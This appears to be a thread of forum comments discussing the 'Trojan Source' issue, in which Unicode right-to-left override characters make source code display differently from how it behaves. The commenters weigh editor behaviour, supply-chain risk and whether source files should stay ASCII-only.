But there are plenty of other systems which display weird RTL behavior.
https://gist.github.com/Q726kbXuN/3c978a63cb6de5168c017da4df...
I've not seen one editor yet that doesn't at least hint there's a problem with syntax highlighting, if not just outright show nonsense.
It's just that many people while knowing the problem never considered that it could be used in supply chain attacks.
These problems won't go away for a while, unicode is fucking hard. Almost every app I ever tried it had at least some problems with %u202E (the right to left overwrite),
To a sighted human reviewer. If I'm not mistaken, a blind programmer using a screen reader would be immune to this trick.
Maybe it is the next plague waiting to happen?
Actually I think the format of the example in https://www.trojansource.codes/ is too strange that I would like committer to fix.
Others might have legitimate use case for this but I certainly don’t, we keep localization in known file types only.
If I write some text in a comment, it should still be visibe, regardless of direction/bidi code, right?
I think most code is safe.
At the same time, one can't just put a blanket ban on Unicode. It exists for a reason. People want to use their native languages to name identifiers, or at least to write comments. Restricting ourselves to ASCII again and thus forcing English on everybody is not a solution.
Yet most programming languages force them to use English Arabic numbers.
Wouldn’t it be great to use Roman numerals?
And then images in source code are really difficult to handle. Wouldn’t it be nice to compile a word document with embedded images?
I think I wouldn’t mind staying with ASCII for source code, except for string literals (difficult enough).
What I have in mind actually exists already: Jupyther notebooks, which combine code, text, and resources combined into a nice JSON ball. Horrible for SCMs and editors without using special plugins of course.